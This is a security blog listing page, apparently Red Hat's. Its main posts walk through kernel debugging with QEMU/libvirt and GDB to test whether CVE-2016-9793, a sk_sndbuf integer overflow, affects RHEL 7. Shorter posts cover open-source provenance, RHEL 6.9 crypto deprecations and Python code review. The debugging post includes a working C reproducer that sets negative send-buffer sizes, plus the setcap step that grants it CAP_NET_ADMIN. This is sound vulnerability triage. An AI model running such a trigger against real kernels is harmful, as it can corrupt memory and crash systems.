Latest Posts

  • Debugging a kernel in QEMU/libvirt - Part II

    Authored by: Wade Mealing

    This blog has previously shown how to configure a Red Hat Enterprise Linux system for kernel debugging. It expects that the system has been configured, that the source code matching the installed kernel version is handy, and that the reader is ready to follow along.

    This should not be run on a production system, as interruption of system function is guaranteed.

    The particular problem under investigation is CVE-2016-9793. As discussed on the oss-security list, this vulnerability was classified as an integer overflow and needed to be addressed.

    Eric Dumazet describes the flaw in the message of the commit that attempts to fix it:

    $ git show b98b0bc8c431e3ceb4b26b0dfc8db509518fb290
    commit b98b0bc8c431e3ceb4b26b0dfc8db509518fb290
    Author: Eric Dumazet <edumazet@google.com>
    Date:   Fri Dec 2 09:44:53 2016 -0800
        net: avoid signed overflows for SO_{SND|RCV}BUFFORCE
        CAP_NET_ADMIN users should not be allowed to set negative
        sk_sndbuf or sk_rcvbuf values, as it can lead to various memory
        corruptions, crashes, OOM...
        Note that before commit 82981930125a ("net: cleanups in
        sock_setsockopt()"), the bug was even more serious, since SO_SNDBUF
        and SO_RCVBUF were vulnerable.
        This needs to be backported to all known linux kernels.
        Again, many thanks to syzkaller team for discovering this gem.
        Signed-off-by: Eric Dumazet <edumazet@google.com>
        Reported-by: Andrey Konovalov <andreyknvl@google.com>
        Signed-off-by: David S.  Miller <davem@davemloft.net>
    diff --git a/net/core/sock.c b/net/core/sock.c
    index 5e3ca41..00a074d 100644
    --- a/net/core/sock.c
    +++ b/net/core/sock.c
    @@ -715,7 +715,7 @@ int sock_setsockopt(struct socket *sock, int level, int optname,
                    val = min_t(u32, val, sysctl_wmem_max);
                    sk->sk_userlocks |= SOCK_SNDBUF_LOCK;
    -               sk->sk_sndbuf = max_t(u32, val * 2, SOCK_MIN_SNDBUF);
    +               sk->sk_sndbuf = max_t(int, val * 2, SOCK_MIN_SNDBUF);
                    /* Wake up sending tasks if we upped the value.  */
    @@ -751,7 +751,7 @@ set_rcvbuf:
                     * returning the value we actually used in getsockopt
                     * is the most desirable behavior.
    -               sk->sk_rcvbuf = max_t(u32, val * 2, SOCK_MIN_RCVBUF);
    +               sk->sk_rcvbuf = max_t(int, val * 2, SOCK_MIN_RCVBUF);
            case SO_RCVBUFFORCE:

    The purpose of the investigation is to determine if this flaw affects the shipped kernels.

    User interaction with the kernel happens through syscalls and ioctls. In this case, the issue lies in the setsockopt syscall, which ends up being handled in a function named sock_setsockopt, as shown in the patch.
    The flaw is not always clearly documented in patches, but in this case the area that the patch modifies is an ideal place to start looking.

    Investigating sock_setsockopt function

    The sock_setsockopt code shown below has the relevant parts highlighted in an attempt to explain key concepts that complicate the investigation of this flaw.

    A capabilities check is the first hurdle that must be overcome when attempting to force-set the sk_sndbuf size. Inspecting the sock_setsockopt code, a capable() check enforces that the process has the CAP_NET_ADMIN privilege before it may force buffer sizes. Requiring this capability reduces the attack vector but does not eliminate it entirely: the root user holds this capability by default, and it can be granted to binaries run by other users. The relevant section of code is:

             if (!capable(CAP_NET_ADMIN)) {
                 ret = -EPERM;

    The reproducer needs the CAP_NET_ADMIN capability to call setsockopt() with the SO_SNDBUFFORCE or SO_RCVBUFFORCE parameter. To read more about Linux kernel capabilities, check out the setcap(8) and capabilities(7) man pages.

    We can see from the patch and surrounding discussion that it is possible to set sk->sk_sndbuf to a negative value. Following the flow of the code, the value passes through the max_t macro before being assigned. The patch explicitly changes the type to which the max_t macro casts its arguments.

    Using GDB and setting a breakpoint will show how various input values affect the final value of sk->sk_sndbuf.

    Integer overflows

    The patch shows that the type used in the max_t macro comparison was changed from u32 (unsigned 32-bit integer) to int (signed 32-bit integer). Before making assumptions or doing any kind of investigation, we can hypothesize that the problem lies in the outcome of the max_t comparison.

    Here is the definition of max_t:

    #define max_t(type, x, y) ({            \
        type __max1 = (x);            \
        type __max2 = (y);            \
        __max1 > __max2 ? __max1: __max2; })

    My understanding of the max_t macro is that it casts both the second and third parameters to the type specified by the first parameter, returning __max1 if __max1 is greater than __max2. The unintended side effect is that, when casting to an unsigned type, the comparison turns negative values into large positive integers.

    It may be tempting to program the relevant macro, type definitions, and operations on the variables into a small C program to test. Resist! Armed with your kernel debugging knowledge and a small C program to exercise the code, we can see how the tool-chain decided to create this code.

    For the test case, we'll need to use values that test how the compiler and architecture deal with these kinds of overflows. Input that could create overflows or final negative values should be used as test cases.

    Building the test case

    To exercise this particular section of code (before the patch) we can build a small reproducer in C. Feel free to choose another language and write test code that sets the same socket options.

    #include <stdio.h>
    #include <limits.h>
    #include <linux/types.h>
    #include <sys/types.h>
    #include <sys/socket.h>
    #include <errno.h>
    #include <string.h>

    int main(int argc, char **argv)
    {
        int sockfd, sendbuff;
        socklen_t optlen = sizeof(sendbuff);
        int i = 0;

        /* Boundary values used to test our hypothesis */
        int val[] = {INT_MIN, INT_MIN + 100, INT_MIN + 200, -200, 0, 200,
                     INT_MAX - 200, INT_MAX - 100, INT_MAX};

        sockfd = socket(AF_INET, SOCK_DGRAM, 0);
        if (sockfd == -1) {
            printf("Error: %s\n", strerror(errno));
            return 1;
        }

        for (i = 0; i < (int)(sizeof(val) / sizeof(val[0])); i++) {
            sendbuff = (val[i] / 2.0);
            printf("== Setting the send buffer to %d\n", sendbuff);

            if (setsockopt(sockfd, SOL_SOCKET, SO_SNDBUFFORCE,
                           &sendbuff, sizeof(sendbuff)) == -1)
                printf("SETSOCKOPT ERROR: %s\n", strerror(errno));

            if (getsockopt(sockfd, SOL_SOCKET, SO_SNDBUF,
                           &sendbuff, &optlen) == -1)
                printf("GETSOCKOPT ERROR: %s\n", strerror(errno));
            else
                printf("getsockopt returns buffer size: %d\n", sendbuff);
        }
        return 0;
    }

    Compile the reproducer:

    [user@target /tmp/]# gcc setsockopt-integer-overflow-ver-001.c -o setsockopt-reproducer

    And set the capability of CAP_NET_ADMIN on the binary:

    [user@target /tmp/]# setcap CAP_NET_ADMIN+ep setsockopt-reproducer

    If there are exploit creators (or flaw reporters) in the audience, understand that naming your files reproducer.c and reproducer.py gets confusing; please try to give files unique names. This can save time when searching through the 200 reproducer.c files lying around the file system.

    Saving time

    Virtual machines afford programmers the ability to save the system state for immediate restore. This allows the system to return to a "known good state" if it was to panic or become corrupted. Libvirt calls this kind of snapshot a "System Checkpoint" style snapshot.

    The virt-manager GUI tool in Red Hat Enterprise Linux 7 did not support creating system checkpoints. The command-line interface can create system-checkpoint snapshots with:

    # virsh snapshot-create-as RHEL-7.2-SERVER snapshot-name-1

    To restore the system to the snapshot, run the command:

    # virsh snapshot-revert RHEL-7.2-SERVER snapshot-name-1

    If the system is running Fedora 20 or newer, and you prefer to use GUI tools, Cole Robinson has written an article which shows how to create system checkpoint style snapshots from within the virt-manager.

    The advantage of snapshots is that you can restore your system back to a working state in case of file system corruption, which can otherwise force you to reinstall from scratch.

    Debugging and inspecting

    GDB contains a "Text User Interface" mode which allows for greater insights into the running code. Start GDB in the "Text User Interface Mode" and connect to the running qemu/kernel using gdb as shown below:

    gdb -tui ~/kernel-debug/usr/lib/debug/lib/modules/3.10.0-327.el7.x86_64/vmlinux
    <gdb prelude here>
    (gdb) dir ~/kernel-debug/usr/src/debug/kernel-3.10.0-327.el7/linux-3.10.0-327.el7.x86_64/
    (gdb) set architecture i386:x86-64:intel
    (gdb) set disassembly-flavor intel
    (gdb) target remote localhost:1234

    The extra line beginning with dir points GDB to the location of the source used to build the binary. This allows GDB to show the current line of execution. This directory tree was created when extracting the kernel-debuginfo packages using rpm2cpio.

    GDB should appear similar to the below screenshot:

    The TUI mode shows the source code in the top window and the interactive command-line session in the bottom window. The TUI can be customized further; this is left as an exercise for the reader.

    Inspecting the value

    The plan was to inspect the value at the time of the write to sk->sk_sndbuf, to determine how different parameters would affect the final value.

    We will set a breakpoint in GDB to stop at that position and print out the value of sk->sk_sndbuf.

            sk->sk_userlocks |= SOCK_SNDBUF_LOCK;
    >>>>>>>>sk->sk_sndbuf = max_t(u32, val * 2, SOCK_MIN_SNDBUF);  
            /* Wake up sending tasks if we upped the value.  */
        case SO_SNDBUFFORCE:
            if (!capable(CAP_NET_ADMIN)) {
                ret = -EPERM;
            goto set_sndbuf;

    The line which assigns the sk->sk_sndbuf value is line 704 in net/core/sock.c. To set a breakpoint on this line, issue the "break" command to GDB with the location where it should break.

    Additional commands have been appended that will run every time the breakpoint has been hit. In this demonstration the breakpoint will print the value of sk->sk_sndbuf and resume running.

    If you are not seeing the (gdb) prompt, hit Ctrl+C to interrupt and pause the system. While the system is suspended in GDB it will not take keyboard input or continue any processing.

    (gdb) break net/core/sock.c:703
    Breakpoint 1 at 0xffffffff81516ede: file net/core/sock.c, line 703.
    (gdb) commands
    Type commands for breakpoint(s) 1, one per line.
    End with a line saying just "end".
    >p sk->sk_sndbuf
    >continue
    >end

    The "commands" directive is similar to a function that runs each time the most recently set breakpoint is hit. Type the 'continue' directive at the (gdb) prompt to resume processing on the target system.

    The plan was to show a binary compare of val to inspect the comparison; however, this value was optimized out. GCC would allow us to inspect 'val' directly if we were to step through the assembly and inspect the registers at the time of comparison. Doing so, however, is beyond the scope of this document.

    Let's give it a simple test, running the reproducer against the code with predictable boundary values. Start another terminal, connect to the target node, and run the command:

    [user@target]# ./setsockopt-reproducer 
    Setting the send buffer to -1073741824
    getsockopt buffer size: -2147483648
    Setting the send buffer to -1073741774
    getsockopt buffer size: -2147483548
    Setting the send buffer to -1073741724
    getsockopt buffer size: -2147483448
    Setting the send buffer to -100
    getsockopt buffer size: -200
    Setting the send buffer to 0
    getsockopt buffer size: 4608
    Setting the send buffer to 100
    getsockopt buffer size: 4608
    Setting the send buffer to 1073741723
    getsockopt buffer size: 2147483446
    Setting the send buffer to 1073741773
    getsockopt buffer size: 2147483546

    At this point a breakpoint should show as hit in the GDB terminal, printing out the value every time execution passes net/core/sock.c line 704.

    Breakpoint 4, sock_setsockopt (sock=sock@entry=0xffff88003c57b680, level=level@entry=1, optname=optname@entry=32, optval=<optimized out>, optval@entry=0x7ffce597f1a0 "",
        optlen=optlen@entry=4) at net/core/sock.c:704
    $9 = 212992

    The above example shows $N = value as the output of the commands that we created. Each dollar value ($N) shown in the output corresponds to one of the values iterated through in the test-case code.

    int val[] = {INT_MIN, INT_MIN + 100, INT_MIN + 200, -200, 0, 200, INT_MAX - 200, INT_MAX - 100, INT_MAX};

    Listed below is the complete output of the example script:

    Breakpoint 1, sock_setsockopt (sock=sock@entry=0xffff8800366cf680, level=level@entry=1, optname=optname@entry=32, optval=<optimized out>, optval@entry=0x7ffe3ea373c4 "",
        optlen=optlen@entry=4) at net/core/sock.c:704
    $1 = 212992
    Breakpoint 1, sock_setsockopt (sock=sock@entry=0xffff8800366cf680, level=level@entry=1, optname=optname@entry=32, optval=<optimized out>, optval@entry=0x7ffe3ea373c4 "2",
        optlen=optlen@entry=4) at net/core/sock.c:704
    $2 = -2147483648
    Breakpoint 1, sock_setsockopt (sock=sock@entry=0xffff8800366cf680, level=level@entry=1, optname=optname@entry=32, optval=<optimized out>, optval@entry=0x7ffe3ea373c4 "d",
        optlen=optlen@entry=4) at net/core/sock.c:704
    $3 = -2147483548
    Breakpoint 1, sock_setsockopt (sock=sock@entry=0xffff8800366cf680, level=level@entry=1, optname=optname@entry=32, optval=<optimized out>,
        optval@entry=0x7ffe3ea373c4 "\234\377\377\377\003", optlen=optlen@entry=4) at net/core/sock.c:704
    $4 = -2147483448
    Breakpoint 1, sock_setsockopt (sock=sock@entry=0xffff8800366cf680, level=level@entry=1, optname=optname@entry=32, optval=<optimized out>, optval@entry=0x7ffe3ea373c4 "",
        optlen=optlen@entry=4) at net/core/sock.c:704
    $5 = -200
    Breakpoint 1, sock_setsockopt (sock=sock@entry=0xffff8800366cf680, level=level@entry=1, optname=optname@entry=32, optval=<optimized out>, optval@entry=0x7ffe3ea373c4 "d",
        optlen=optlen@entry=4) at net/core/sock.c:704
    $6 = 4608
    Breakpoint 1, sock_setsockopt (sock=sock@entry=0xffff8800366cf680, level=level@entry=1, optname=optname@entry=32, optval=<optimized out>, optval@entry=0x7ffe3ea373c4 "\233\377\377?\003",
        optlen=optlen@entry=4) at net/core/sock.c:704
    $7 = 4608
    Breakpoint 1, sock_setsockopt (sock=sock@entry=0xffff8800366cf680, level=level@entry=1, optname=optname@entry=32, optval=<optimized out>, optval@entry=0x7ffe3ea373c4 "\315\377\377?\003",
        optlen=optlen@entry=4) at net/core/sock.c:704
    $8 = 2147483446


    As we can see, the final value of sk->sk_sndbuf can be below zero if an application manages to set the value incorrectly. Many areas of the kernel use sk->sk_sndbuf; the most obvious is the tcp_sndbuf_expand function, where the value is used and memory is allocated based on this size.

    This kernel is going to be marked as vulnerable in EL7. I leave it as an exercise for the reader to do their own confirmation of other flaws they may be interested in.


    Listed below are a number of problems that first-time users have run into. Please leave problems in the comments and I may edit this article to help others find the solution faster.

    Problem: Can't connect to gdb?
    Solution: Use netstat to check that the port is open and listening on the host. Add a firewall rule to allow incoming connections to this port.

    Problem: GDB doesn't allow me to type?
    Solution: Hit Ctrl+C to interrupt the current system, enter your command, then type 'continue' to resume the host's execution.

    Problem: Breakpoint is set, but it never gets hit?
    Solution: It's likely that the booted kernel and source code do not match; check that the running kernel matches the source code/line number that has been set.

    Problem: The ssh connection drops while running the code!
    Solution: If the target system remains in GDB's interrupted mode for too long, network connections to the system can be dropped. Try connecting to the guest via "virsh console SOMENAME" to get a non-networked console. You may need to set up a serial console on the guest if one is not present.

    Additional thanks to:
    - Doran Moppert (GDB assistance!)
    - Prasad Pandit (Editing)
    - Fabio Olive Leite (Editing)

    Posted: 2017-02-24T14:30:00+00:00
  • Do you know where that open source came from?

    Authored by: Joshua Bressers

    Last year, while speaking at RSA, a reporter asked me about container provenance. This wasn’t the easiest question to answer because there is a lot of nuance around containers and what’s inside them. In response, I asked him if he would eat a sandwich he found on the ground. The look of disgust I got was priceless, but it opened up a great conversation.

    Think about it this way: If there was a ham sandwich on the ground that looked mostly OK, would you eat it? You can clearly see it’s a ham sandwich. The dirt all brushed off. You do prefer wheat bread to white. So what’s stopping you? It was on the ground. Unless you’re incredibly hungry and without any resources, you won’t eat that sandwich. You’ll visit the sandwich shop across the street.

    The other side of this story is just as important though. If you are starving and without money, you’d eat that sandwich without a second thought. I certainly would. Starving to death is far worse than eating a sandwich of questionable origin. This is an example you have to remember in the context of your projects and infrastructure. If you have a team that is starving for time, they aren’t worried about where they get their solutions. For many, making the deadline is far more important than “doing it right.” They will eat the sandwich they find.

    This year at RSA, I’m leading a Peer2Peer session titled, “Managing your open source.” I keep telling everyone that open source won. It’s used everywhere; there’s no way to escape it anymore. But a low-cost, flexible, and more secure software option must have some kind of hidden downside, right? Is the promise of open source too good to be true? Only if you don’t understand the open source supply chain.

    Open source is everywhere, and that means it’s easily acquirable. From cloning off of github to copying random open source binaries downloaded from a project page, there’s no stopping this sort of behavior. If you try, you will fail. Open source won because it solves real problems and it snuck in the back door when nobody was looking. It’s no secret how useful open source is: by my guesstimates, the world has probably saved trillions in man hours and actual money thanks to all the projects that can be reused. If you try to stop it now it’s either going to go back underground, making the problem of managing your open source usage worse or, worse still, you’re going to have a revolt. Open source is amazing, but there is a price for all this awesome.

    Fundamentally, this is our challenge: How do we empower our teams to make the right choices when choosing open source software?

    We know they’re going to use it. We can’t control every aspect of its use, but we can influence its direction. Anyone who is sensitive to technical debt will understand that open source isn’t a “copy once and forget” solution. It takes care and attention to ensure that you haven’t just re-added Heartbleed to your infrastructure. Corporate IT teams need to learn how to be the sandwich shop - how do we ensure that everyone is coming to us for advice and help with open source instead of running whatever they find on the ground? There aren’t easy answers to all of these questions, but we can at least start the discussion.

    In my RSA Peer2Peer session we’re going to discuss what this all means in the modern enterprise:
    - How are you managing your open source?
    - Are you doing nothing?
    - Do you have a program where you vet the open source used to ensure a certain level of quality?
    - How do you determine quality?
    - Are you running a scanner that looks for security flaws?
    - What about the containers or Linux distribution you use, where did that come from, who is taking care of it?
    - How are you installing your open source applications on your Linux or even Windows servers?

    There are a lot of questions, too many to ask in a single hour or day, and far too many to effectively answer over the course of a career in IT security. That’s okay though; we want to start a discussion that I expect will never end.

    See you at RSA on Tuesday February 14, 2017 | 3:45 PM - 4:30 PM | Marriott Marquis | Nob Hill C

    Posted: 2017-02-08T14:30:00+00:00
  • Debugging a kernel in QEMU/libvirt

    Authored by: Wade Mealing

    A kernel bug announced on the oss-security list claims to create a situation in which memory corruption can panic the system, by causing an integer used in determining the size of TCP send and receive buffers to be negative. Red Hat engineering sometimes backports security fixes and features from the current kernel, diverging the Red Hat Enterprise Linux kernel from upstream and causing some security issues to no longer apply. This blog post shows how to use live kernel debugging to determine if a system is at risk from this integer overflow flaw.

    This walkthrough assumes that the reader has a Red Hat Enterprise Linux 7 guest system and basic knowledge of C programming.

    Setting up the guest target to debug

    The guest to be the target of the debugging session is a libvirt (or KVM/QEMU) style virtual machine. The guest's QEMU process will expose a GDB stub on a TCP port (TCP/1234) for use by GDB (the GNU Debugger).

    Modifying the guest domain file

    The virsh edit command is intended to be a safe method of manipulating the raw XML that describes the guest, which is what we need to do in this circumstance. We need to configure the guest via the domain configuration file, as there is no tickbox in virt-manager to enable what we need.

    The first change is to set the XML namespace for QEMU, which sounds more complex than it is.

    # virsh edit your-virt-host-name

    Find the domain directive and add the option xmlns:qemu='http://libvirt.org/schemas/domain/qemu/1.0'.

    <domain type='kvm'
            xmlns:qemu='http://libvirt.org/schemas/domain/qemu/1.0' >

    Add a new qemu:commandline tag inside domain which will allow us to pass a parameter to QEMU for this guest when starting.

    <domain type='kvm'
            xmlns:qemu='http://libvirt.org/schemas/domain/qemu/1.0' >
        <qemu:commandline>
            <qemu:arg value='-s'/>
        </qemu:commandline>

    Save the file and exit the editor. Some versions of libvirt may complain that the XML has invalid attributes; ignore this and save the file anyway. The libvirtd daemon does not need to be restarted. The guest will need to be destroyed and restarted if it is already running.

    The -s parameter is an abbreviation of -gdb tcp::1234. If you have many guests needing debugging on different ports, or already have a service running on port 1234 on the host, you can set the port in the domain XML file as shown below:

            <qemu:commandline>
                <qemu:arg value='-gdb'/>
                <qemu:arg value='tcp::1235'/>
            </qemu:commandline>

    If it is working, the QEMU process on the host will be listening on the port specified as shown below:

    [root@target]# netstat -tapn | grep 1234
    tcp        0      0 0.0.0.0:1234        0.0.0.0:*           LISTEN      11950/qemu-system-x

    Change /etc/default/grub on the guest

    The guest kernel will need to be booted with new parameters to enable KGDB debugging facilities. Add the value kgdboc=ttyS0,115200 to the kernel command line. On the system shown here, a serial console is also running on ttyS0 with no adverse effects.

    Use the helpful grubby utility to apply these changes across all kernels.

    # grubby --update-kernel=ALL --args="console=ttyS0,115200 kgdboc=ttyS0,115200"

    Downloading debuginfo packages

    The Red Hat Enterprise Linux kernel packages do not include debug symbols, as the symbols are stripped from binary files at build time. GDB needs those debug symbols to assist programmers when debugging. For more information on debuginfo, see this segment of the Red Hat Enterprise Linux 7 developer guide.

    RPM packages containing the name 'debuginfo' contain files with symbols. These packages can be downloaded from Red Hat using yum or up2date.

    To download these packages on the guest:

    # debuginfo-install --downloadonly kernel-3.10.0-327.el7

    This should download two files into the current directory on the guest for later extraction and use by GDB.

    Copy these files from the guest to the host so that the host's GDB can use them. I chose ~/kernel-debug/ as a sane location for these files. Create the directory if it doesn't already exist.

    # mkdir -p ~/kernel-debug
    # scp yourlogin@guest:kernel*.rpm ~/kernel-debug/

    The final step on the guest is to reboot the target. At this point the system should reboot with no change in behavior.

    Preparing the host to debug

    The system which runs the debugger doesn't need to be the host that contains the guest. The debugger system must be capable of making a connection to the guest running on the specified port (1234). In this example these commands will be run on the host which contains the virtual machine.

    Installing GDB

    Install GDB on the host using a package manager.

    # sudo yum -y install gdb

    Extracting files to be used from RPMs

    When Red Hat builds the kernel, it strips debugging symbols from the RPMs. This makes for smaller downloads and lower memory use at runtime. The stripped packages are the well-known RPM packages named like kernel-3.10.0-327.el7.x86_64.rpm. The non-stripped debug information is stored in debuginfo RPMs, like the ones downloaded earlier in this document using debuginfo-install. They must match the exact kernel version and architecture being debugged on the guest to be of any use.

    The target does not need to match the host system architecture or release version. The example below can extract files from RPMs on any system.

    # cd ~/kernel-debug
    # rpm2cpio kernel-debuginfo-3.10.0-327.el7.x86_64.rpm | cpio -idmv
    # rpm2cpio kernel-debuginfo-common-3.10.0-327.el7.x86_64.rpm | cpio -idmv

    This extracts the files within the packages into the current working directory, laid out as they would be on the intended file system. No scripts or commands within the RPMs are run. These files are not installed, and the system package management tools will not manage them. This allows them to be used on other architectures, releases, or distributions.

    • The unstripped kernel is the vmlinux file in ~/kernel-debug/usr/lib/debug/lib/modules/3.10.0-327.el7.x86_64/vmlinux
    • The kernel source is in the directory ~/kernel-debug/usr/src/debug/kernel-3.10.0-327.el7/linux-3.10.0-327.el7.x86_64/
    Connecting to the target system from the remote system

    Start GDB with the text user interface, passing as a parameter the path to the unstripped kernel binary (vmlinux) running on the target system.

    # gdb -tui ~/kernel-debug/usr/lib/debug/lib/modules/3.10.0-327.el7.x86_64/vmlinux
    <gdb prelude shows here>

    GDB must be told where to find the target system. Type the following into the GDB session:

    set architecture i386:x86-64:intel
    target remote localhost:1234
    dir ~/kernel-debug/usr/src/debug/kernel-3.10.0-327.el7/linux-3.10.0-327.el7.x86_64/

    Commands entered at the (gdb) prompt can be saved in ~/.gdbinit to reduce repetitive entry.
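    For example, a ~/.gdbinit along these lines avoids retyping the setup (a sketch; the paths assume the extraction location chosen earlier, so adjust them to your layout):

```
set architecture i386:x86-64:intel
target remote localhost:1234
dir ~/kernel-debug/usr/src/debug/kernel-3.10.0-327.el7/linux-3.10.0-327.el7.x86_64/
```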

    At this point, if all goes well, the system should be connected to the remote GDB session.

    The story so far...

    Congratulations, you've made it this far. If you've been following along, you should have set up a GDB session to a system running in libvirt and be able to recreate flaws and begin investigating them.

    Join the dark side next time, when we validate an integer promotion comparison flaw.

    Posted: 2017-01-11T14:30:00+00:00
  • Deprecation of Insecure Algorithms and Protocols in RHEL 6.9

    Authored by: Nikos Mavrogian...

    Cryptographic protocols and algorithms have a limited lifetime—much like everything else in technology. Algorithms that provide cryptographic hashes and encryption as well as cryptographic protocols have a lifetime after which they are considered either too risky to use or plain insecure. In this post, we will describe the changes planned for the 6.9 release of Red Hat Enterprise Linux 6, which is already on Production Phase 2.

    Balancing Legacy Use Cases and Modern Threats

    For the RHEL operating system, which has its useful lifetime measured in decades, in addition to adding new features it is necessary to periodically revisit default settings and phase out (or completely deprecate) protocols and algorithms whose use—accidental or intentional—could cause irreparable damage. At the same time, we must ensure that the vast majority of existing and legacy applications continue to operate without changes, and provide mechanisms for the administrator to revert any changes to the previous defaults when necessary.

    What Are the Threats?

    Given that any change in application or library default settings cannot be without side-effects, it is important to provide the context under which such changes are necessary. In the past few years, we’ve identified several protocol attacks with real-world impact that relied on obsolete and legacy algorithm and protocol configurations. A few prominent attacks are briefly described below:

    • DROWN in 2016; it relied on servers enabling the SSL 2.0 protocol, allowing the attackers to obtain sufficient information to decrypt other, unrelated TLS sessions.
    • SLOTH in 2016; it relied on clients enabling the MD5 algorithm, broken since 2004; it allowed attackers to decrypt TLS sessions.
    • LOGJAM and FREAK in 2015. While the details of the attacks differ, both of these attacks relied on export cryptography being enabled in the server, allowing an attacker to decrypt TLS sessions.

    Why Would Insecure Configuration Remain Enabled?

    While all of the exploited protocols and algorithms were known to be obsolete or insecure for more than a decade, the impact of these attacks was still high. That indicates that these obsolete protocols and algorithms were enabled on Internet servers possibly due to:

    • misconfiguration,
    • administrators’ hope of improving compatibility with legacy clients,
    • re-use of old configuration files.

    Traditionally, we have not been keen on deprecating algorithms and protocols during the RHEL lifetime, to avoid breaking existing and legacy applications. This stems from our belief that, for an operating system, keeping operations running is more important than addressing flaws that may not apply to every operating system setup.

    Solution for RHEL 6.9

    However, after considering these attacks and the fact that it is unrealistic to expect all administrators to keep up with cryptographic advances, we have decided to provide a protection net, which will prevent future cryptographic attacks due to accidental misconfiguration with legacy algorithms and protocols in default RHEL 6.9 installations.

    No Export Ciphersuites and SSL 2.0

    In particular, we will take steps that will ensure that the TLS ciphersuites marked as export, as well as the SSL 2.0 protocol, are completely removed from the operating system. These two points involve algorithms with no real-world use and a protocol that has been considered deprecated for more than 20 years. We will not provide a way to re-enable these options because we are convinced that these are primarily used to attack misconfigured systems rather than for real-world use cases.

    Limited MD5, RC4, and DH

    In addition, we will ensure that no application can be used with insecure signature-verification algorithms such as MD5, and that TLS client applications refuse to communicate with servers that advertise Diffie-Hellman parameters shorter than 1024 bits. The latter ensures that LOGJAM-style attacks are prevented. Furthermore, we will disable the usage of RC4 in contexts where this will not introduce compatibility issues.

    All-around Application Support for TLS 1.2

    While deprecating insecure algorithms and protocols protects applications running in RHEL from future attacks taking advantage of them, it is also important, given that RHEL 6.9 entered Production Phase 2, to provide a solid cryptographic base for the remaining lifetime of the product. For that we will ensure that all the back-end cryptographic components support TLS 1.2, allowing new applications to be deployed and used during its lifetime.

    Summary of Changes to Cryptographic Back-ends in RHEL 6.9

    • TLS 1.2 protocol: The protocol is made available to all shipped cryptographic libraries and enabled by default. Revertable: N/A.
    • SSL 2.0 protocol: The shipped TLS libraries will no longer include support for the SSL 2.0 protocol. Revertable: no.
    • Export TLS ciphersuites: The shipped TLS libraries will no longer include support for Export TLS ciphersuites. Revertable: no.
    • TLS Diffie-Hellman key exchange: Only parameters larger than 1024 bits will be accepted by default.[1] Revertable: yes; administrators can revert this setting system-wide (information will be provided in the release notes).
    • MD5 algorithm for digital signatures: The algorithm will not be enabled by default for TLS sessions or certificate verification in any of the TLS libraries we ship. Revertable: yes; administrators can revert this setting system-wide (information will be provided in the release notes).
    • RC4 algorithm: The algorithm will no longer be enabled by default for OpenSSH sessions. Revertable: yes; administrators can revert this setting system-wide (information will be provided in the release notes).

    1. This, exceptionally, applies only to OpenSSL, GnuTLS, and NSS cryptographic back-ends, not to Java/OpenJDK. 

    Posted: 2017-01-03T14:30:00+00:00
  • Pythonic code review

    Authored by: Ilya Etingof

    Most of us programmers go through technical interviews every once in a while. At other times, many of us sit on the opposite side of the table running these interviews. Stakes are high, emotions run strong, intellectual pressure builds up. I have found that an unfortunate code review may turn into something similar to a harsh job interview.

    While it is theoretically in the best interest of the whole team to end up with high quality code, variations in individual's technical background, cultural differences, preconceptions built up on previous experience, personality quirks, and even temper may lure people into a fierce fight over relatively unimportant matters.

    Consider an imaginary pull request. There we typically have two actors: the author and the code reviewers. Authors sometimes overestimate the quality of their code, which provokes them to be overly defensive and possibly even hostile to any argument. People reviewing the code may find themselves in a position of power to judge the author's work. Once the actors collide over a matter where they take orthogonal and sufficiently strong sides, all is fair in love and war.

    Another interesting phenomenon I encountered while reviewing Python code can probably be attributed to Python's low barrier to entry for newcomers. Programmers switching over from other languages bring along customs and idioms they are used to in their "mother tongue". I can usually tell from their Python code whether the author is a former Java, Perl, or Bash programmer. As much as I admire other technologies and expertise, I believe it is most efficient and enjoyable to code in harmony with the language rather than stretching it beyond its intended design.

    In this article I'll focus on my personal experience in authoring and reviewing Python code from both psychological and technical perspectives. And I'll do so keeping in mind the ultimate goal of striking a balance between code reviews being enjoyable and technically fruitful.

    Why we review code

    The most immediate purpose of a code review is to make code better by focusing more eyeballs on it. But code review seems to be a lot more than that!

    It is also a way for the engineers to communicate, learn and even socialize over a meaningful and mutually interesting topic. In a team where both senior and junior engineers work together, a code review provides the opportunity for the junior engineers to observe masters at work and learn from them.

    Seniors, in turn, get a chance to coach fellow engineers, be challenged and thus prove their authority (which is healthy). Everyone can see the problem from different perspectives, which ultimately contributes to a better outcome.

    For mature Pythonistas coding with newbies, code review is a way to teach them how we do things in Python with the goal of creating idiomatic Python coders out of them.

    For the greater good

    The best we can do on the psychological side is to, as an author, relinquish our emotional attachment to our code and, as a reviewer, consciously restrain ourselves from attacking other authors' ideas, focusing instead on mentoring them.

    For a review to be a productive and relatively comfortable experience, a reviewer should stay positive and thankful, and honestly praise the author's work and talent in a genuine manner. Suggested changes should be justified on solid technical grounds, never by the reviewer's personal taste.

    For authors it may help to keep reminding themselves how much time and effort it might have taken for reviewers to work with the author's code -- their feedback is precious!

    As idealistic as it sounds, my approach aims at downplaying my ego by optimizing for a healthier team and a more enjoyable job. I suspect that it may come at the cost of somewhat compromised code quality, but to me that is worth it. My hope is that even if we do merge sub-optimal code at times, we will learn from it and re-factor later. That is a much cheaper cost than ending up with a stressed, desperate, and demotivated colleague.

    When I'm an author

    As an author, I'm not taking Pull Requests (PRs) lightly. My day's worth of code is likely to keep fellow reviewers busy for a good couple of hours. I know that it's a hard and expensive endeavor. Proper code review may require my team mates to reverse engineer business logic behind a change, trace code execution, conduct thought experiments, and search for edge cases. I do keep that in mind and feel grateful for their time.

    I try to keep my changes small. The larger the change is, the more effort it takes for reviewers to finish the review. That gives smaller, isolated changes a better chance for quality treatment, while huge, messy blobs of diffs risk having reviewers turn a blind eye to my PR.

    Well-debugged code accompanied by tests, properly documented changes complying with team policies -- those PR qualities are signs of respect and care towards reviewers. I feel more confident once I run a quick self code review of my prospective PR prior to submitting it to fellow engineers.

    When I'm a reviewer

    To me, the most important qualities of code are to be clean and as Pythonic as circumstances permit.

    Clean code tends to be well-structured, where logically distinct parts are isolated from each other via clearly visible boundaries. Ideally, each part is specialized on solving a single problem. As Zen of Python puts it: "If the implementation is easy to explain, it may be a good idea".

    Signs of clear code include self-documented functions and variables describing problem entities, not implementation details.

    Readability counts, indeed, though I would not sweat full PEP8 compliance where it becomes nitpicking and bikeshedding.

    I praise authors who code on the shoulders of giants -- abstracting problems into canonical data structures and algorithms and working from there. That gives me the warm feeling that the author belongs to the same trade guild as myself, and confidence that we both know what to expect from the code.

    When I'm a Pythonista

